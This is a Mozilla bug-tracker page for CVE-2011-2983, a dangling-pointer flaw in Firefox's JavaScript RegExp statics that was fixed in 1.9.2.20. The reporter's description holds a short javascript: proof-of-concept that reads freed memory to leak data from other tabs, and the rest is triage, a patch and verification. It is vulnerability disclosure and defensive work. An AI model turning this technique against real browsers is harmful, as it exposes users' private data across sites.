Last Comment Bug 626297 - (CVE-2011-2983) regexp-statics possibly allows to read private data
(CVE-2011-2983)
: regexp-statics possibly allows to read private data
Status: RESOLVED FIXED
[sg:high]
: verified1.9.2
Product: Core
Classification: Components
Component: JavaScript Engine (show other bugs)
: 1.9.2 Branch
: x86 Windows Vista
: -- normal (vote)
: ---
Assigned To: Chris Leary [:cdleary] (not checking bugmail)
:
Mentors:
Depends on: 674545
Blocks:
  Show dependency treegraph
 
Reported: 2011-01-16 18:00 PST by shutdown
Modified: 2014-07-22 13:05 PDT (History)
8 users (show)
rforbes: sec‑bounty+
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---
-
unaffected
-
unaffected
-
unaffected
.20+
.20-fixed
wontfix


Attachments
screenshot of the success case (92.67 KB, image/jpeg)
2011-01-16 18:00 PST, shutdown
no flags Details
Add pending input. (11.84 KB, patch)
2011-04-15 16:46 PDT, Chris Leary [:cdleary] (not checking bugmail)
mrbkap: review+
christian: approval1.9.2.20+
Details | Diff | Splinter Review

Description shutdown 2011-01-16 18:00:32 PST
Created attachment 504334 [details]
screenshot of the success case

Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.13) Gecko/20101203

Description:
When RegExp.input is set,
JSSubString which RegExp.$1 uses becomes a dangling pointer.
So, scripts can read a freed-and-recycled memory area.

Testcase:

1. Open the new tab and execute:

javascript:
  function S(v) { return "xxxxxxx,xxxxxxx,xxxx" + v; }
  /^(.*)/.exec(S(0));
  RegExp.input = S(1);
  clearInterval(window.tid);
  window.tid = setInterval(function () {
    document.title = "[" + RegExp.$1 + "]";
  }, 1000);
  void 0;

2. Then browse some sites in other tabs.
Comment 1 Brendan Eich [:brendan] 2011-01-16 18:45:23 PST
Seems like a dup of bug 610223.

/be
Comment 2 Daniel Veditz [:dveditz] 2011-01-20 13:48:30 PST
(In reply to comment #1)
> Seems like a dup of bug 610223.

That bug was marked as a trunk-only YARR regression that didn't affect 1.9.2.
Comment 4 Chris Leary [:cdleary] (not checking bugmail) 2011-01-20 15:43:55 PST
(In reply to comment #2)
> That bug was marked as a trunk-only YARR regression that didn't affect 1.9.2.

Yeah, I assumed YARR introduced it -- are our regression tests being backported to 1.9.2 at all? I don't know how that process works.
Comment 5 Daniel Veditz [:dveditz] 2011-03-03 13:50:35 PST
(In reply to comment #4)
> Yeah, I assumed YARR introduced it -- are our regression tests being backported
> to 1.9.2 at all? I don't know how that process works.

Not in general. Sometimes/often the regression tests are checked in to the branch along with a specific security bug back-port. Since the YARR regression didn't affect the branches its patch (and therefore regression tests) were not checked in.

We don't always check in tests, depending on how obviously they point at the vulnerability we often wait until we've issued fixes and advisories for the supported branches before checking them in. We set the in-testsuite flag to "?" to remind us to go back and do so.
Comment 6 Chris Leary [:cdleary] (not checking bugmail) 2011-04-15 16:46:06 PDT
Created attachment 526428 [details] [diff] [review]
Add pending input.

Patch against mc-192. User only has access to res->pendingInput through the object interface. res->input is set iff a successful match is performed or (friend API) js_ClearRegExpStatics is called for save/restore junk; failure in the regexp execution clears the statics entirely.
Comment 7 Chris Leary [:cdleary] (not checking bugmail) 2011-07-19 11:23:42 PDT
Comment on attachment 526428 [details] [diff] [review]
Add pending input.

Maybe that was the wrong ? to set.
Comment 8 christian 2011-07-20 10:23:24 PDT
Comment on attachment 526428 [details] [diff] [review]
Add pending input.

a=LegNeato for 1.9.2.20.
Comment 9 Chris Leary [:cdleary] (not checking bugmail) 2011-07-22 11:21:59 PDT
http://hg.mozilla.org/releases/mozilla-1.9.2/rev/271682c48f66
Comment 10 Al Billings [:abillings] 2011-08-09 14:28:47 PDT
Verified fixed in 1.9.2.20 (Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20) using code in comment 0. No longer leaking private data as we are in 1.9.2.19 when I tested it.
Comment 11 Brandon Sterne (:bsterne) 2011-08-12 10:29:28 PDT
Al, why did you move this from .20-fixed to .21-fixed?  Did this not make the build?
Comment 12 Al Billings [:abillings] 2011-08-12 11:37:04 PDT
I did not purposefully change the keyword.
Comment 13 Raymond Forbes[:rforbes] 2013-07-19 18:30:07 PDT
rforbes-bugspam-for-setting-that-bounty-flag-20130719

Note You need to log in before you can comment on or make changes to this bug.